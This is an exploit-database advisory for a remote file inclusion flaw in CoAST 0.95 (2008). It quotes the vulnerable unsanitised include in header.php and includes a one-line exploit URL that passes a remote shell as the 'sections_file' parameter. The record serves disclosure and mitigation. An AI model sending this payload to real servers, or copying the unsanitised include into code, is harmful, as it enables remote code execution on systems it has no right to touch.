The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability

vendor:

The Concord Asset, Software, and Ticket system(CoAST)

by:

DaRkLiFe

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: The Concord Asset, Software, and Ticket system(CoAST)

Affected Version From: 0.95

Affected Version To: 0.95

Patch Exists: YES

Related CWE: N/A

CPE: coast-0.95.tgz

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability

The header.php.dist file exists and it has to be renamed into header.php as given in instructions. The vulnerability lies in line 201 of the header.php file, which includes the $sections_file variable without any sanitization.

Mitigation:

Sanitize user input and validate the data before using it in the application.

Source

Exploit-DB raw data:

**************************************************************************************

Author : By DaRkLiFe
Greetz : str0ke & S.VV.A.T.

**************************************************************************************
Script   : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability

Download :http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0

**************************************************************************************

Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz?


**************************************************************************************

The header.php.dist file exists and it has to be   renamed into header.php as given in instructions.

Vulberable : line 201 : <?php @include $sections_file; ?>

**************************************************************************************

THANKS ! GREETZ ! 
**************************************************************************************

# milw0rm.com [2008-09-27]